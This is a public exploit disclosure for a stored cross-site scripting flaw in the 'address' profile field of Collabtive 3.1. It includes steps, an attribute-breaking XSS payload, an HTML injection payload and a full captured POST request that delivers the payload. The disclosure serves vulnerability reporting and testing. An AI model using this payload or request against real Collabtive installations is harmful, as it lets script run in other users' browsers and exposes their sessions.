Collabtive version 3.1 suffers from a persistent cross site scripting vulnerability.
cc19f89d0564ee7cb7b612af6a8e672f
# Exploit Title: Collabtive 3.1 - 'address' Persistent Cross-Site Scripting
# Date: 2021-01-23
# Exploit Author: Deha Berkin Bir
# Vendor Homepage: https://collabtive.o-dyn.de/
# Version: 3.1
# Tested on: Windows & XAMPP
==> Tutorial <==
1- Login to your account.
2- Go to the profile edit page and write your XSS/HTML payload into "Address" section.
- You will see the executed HTML payload at there. (HTML Injection)
- You will see the executed XSS payload at profile edit section. (XSS)
==> Executed Payloads <==
XSS Payload ==> " onfocus="alert(1)" autofocus="
HTML Payload ==> <h1>DehaBerkinBir</h1>
==> HTTP Request <==
POST /manageuser.php?action=edit HTTP/1.1
Host: (HOST)
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://(HOST)/manageuser.php?action=editform&id=1
Content-Type: multipart/form-data; boundary=---------------------------12097618915709137911841560297
Content-Length: 2327
Connection: close
Cookie: activeSlideIndex=0; PHPSESSID=oj123o7asdfasdfu4pts2g
Upgrade-Insecure-Requests: 1
-----------------------------12097618915709137911841560297
Content-Disposition: form-data; name="name"
admin
-----------------------------12097618915709137911841560297
Content-Disposition: form-data; name="userfile"; filename=""
Content-Type: application/octet-stream
-----------------------------12097618915709137911841560297
Content-Disposition: form-data; name="file-avatar"
-----------------------------12097618915709137911841560297
Content-Disposition: form-data; name="company"
-----------------------------12097618915709137911841560297
Content-Disposition: form-data; name="email"
[email protected]
-----------------------------12097618915709137911841560297
Content-Disposition: form-data; name="web"
-----------------------------12097618915709137911841560297
Content-Disposition: form-data; name="tel1"
-----------------------------12097618915709137911841560297
Content-Disposition: form-data; name="tel2"
-----------------------------12097618915709137911841560297
Content-Disposition: form-data; name="address1"
" onfocus="alert(1)" autofocus="
-----------------------------12097618915709137911841560297
Content-Disposition: form-data; name="zip"
-----------------------------12097618915709137911841560297
Content-Disposition: form-data; name="address2"
-----------------------------12097618915709137911841560297
Content-Disposition: form-data; name="country"
-----------------------------12097618915709137911841560297
Content-Disposition: form-data; name="state"
admin
-----------------------------12097618915709137911841560297
Content-Disposition: form-data; name="gender"
-----------------------------12097618915709137911841560297
Content-Disposition: form-data; name="locale"
-----------------------------12097618915709137911841560297
Content-Disposition: form-data; name="admin"
-----------------------------12097618915709137911841560297
Content-Disposition: form-data; name="oldpass"
admin
-----------------------------12097618915709137911841560297
Content-Disposition: form-data; name="newpass"
-----------------------------12097618915709137911841560297
Content-Disposition: form-data; name="repeatpass"
-----------------------------12097618915709137911841560297--